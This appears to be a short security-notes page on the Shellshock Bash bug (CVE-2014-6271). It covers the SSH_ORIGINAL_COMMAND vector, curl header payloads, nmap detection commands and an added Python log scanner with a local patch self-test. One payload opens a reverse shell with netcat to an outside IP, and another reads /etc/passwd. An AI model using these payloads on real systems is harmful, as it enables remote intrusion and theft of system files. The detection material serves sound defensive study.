# The Shellshock Bug

## Exploiting Shellshock Bug
- The sshd `ForceCommand` option ignores the command the client asked for and executes the configured command instead.
- The client's original command is still exported in the `SSH_ORIGINAL_COMMAND` environment variable. If the user's login shell is Bash, a vulnerable Bash parses the value of `SSH_ORIGINAL_COMMAND` on start-up and runs any commands embedded in it.
## Examples of Shellshock Exploit Commands
### 1

```shell
curl -H "X-Frame-Options: () {:;};echo;/bin/nc -e /bin/bash 192.168.y.y 443" 192.168.x.y/CGI-bin/hello.cgi
```
### 2

```shell
curl --insecure 192.168.x.x -H "User-Agent: () { :; }; /bin/cat /etc/passwd"
```
- Use the nmap `http-shellshock` script to test for the vulnerability:

```shell
nmap -sV -p- --script http-shellshock 192.168.x.x
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
```
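The mechanism behind both the `SSH_ORIGINAL_COMMAND` vector and the CGI header examples above is the same: a vulnerable Bash treats any environment value that begins with `() {` as an exported function definition and, because of the bug, also executes whatever follows the closing brace. The following Python is an added example written for this page from the defender's side; it is not the page's own code nor part of any tool mentioned here. It does two things: it scans Apache combined-format access-log lines (the sample lines are constructed) for header values carrying that function-definition marker and extracts the trailing command for triage, and it runs the widely published Shellshock self-test against a local `bash` to confirm whether the host is patched. The log format, field names and the `Finding` class are assumptions for this example.

```python
"""Shellshock (CVE-2014-6271) detection helpers: log scanning and a local patch check.

Added example for this page; assumes Apache 'combined' log format, where the three
quoted fields are request line, Referer and User-Agent.
"""
import os
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines. Line 1 carries the marker in User-Agent,
# line 2 is benign traffic, line 3 carries it in the Referer field.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/hello.cgi HTTP/1.1" 200 512 "-" "() { :; }; /bin/cat /etc/passwd"
10.0.0.6 - - [10/Oct/2014:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/hello.cgi HTTP/1.1" 200 512 "() {:;};echo;id" "curl/7.37.0"
"""

# A double-quoted log field, allowing backslash-escaped characters inside it.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')

# The exported-function marker Bash looks for ("() {"), a minimal body, the closing
# brace, and everything after it. Whitespace is allowed loosely on purpose: for
# detection it is better to over-match than to miss a variant.
MARKER = re.compile(r'^\s*\(\)\s*\{(?P<body>.*?)\}\s*;?\s*(?P<tail>.*)$', re.DOTALL)

# Names for the quoted fields in combined format, by position.
FIELD_NAMES = ("request", "referer", "user_agent")


@dataclass
class Finding:
    line_no: int            # 1-based line in the log text
    field: str              # which quoted field carried the payload
    trailing_command: str   # text after the function body (empty if none)


def shellshock_tail(value: str) -> Optional[str]:
    """Return the command text that follows a '() { ... }' prefix, '' if the
    prefix is present without a tail, or None if the value is not a payload."""
    m = MARKER.match(value)
    if not m:
        return None
    return m.group("tail").strip()


def scan_access_log(text: str) -> List[Finding]:
    """Scan every quoted field of every combined-format line for the marker."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        for idx, field in enumerate(QUOTED.findall(line)):
            tail = shellshock_tail(field)
            if tail is not None:
                name = FIELD_NAMES[idx] if idx < len(FIELD_NAMES) else f"field{idx}"
                findings.append(Finding(line_no, name, tail))
    return findings


def bash_is_vulnerable(bash_path: str = "bash") -> Optional[bool]:
    """Run the well-known Shellshock self-test: export a variable whose value is a
    function definition with a trailing echo, start bash, and see whether the echo
    ran. True = vulnerable, False = patched, None = bash not runnable here."""
    env = dict(os.environ, x="() { :; }; echo VULNERABLE")
    try:
        out = subprocess.run([bash_path, "-c", "echo test"], env=env,
                             capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired, OSError):
        return None
    return "VULNERABLE" in out.stdout


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.field} carries payload, trailing command: {f.trailing_command!r}")
    print("local bash vulnerable:", bash_is_vulnerable())
```

The scanner deliberately reports the text after the function body rather than just a boolean, since that is what an analyst needs to decide whether a request was a probe (an `echo`, an `id`) or something that warrants a full incident response. The self-test is the same check the original disclosure used; a patched Bash simply keeps `x` as an ordinary string and prints only `test`.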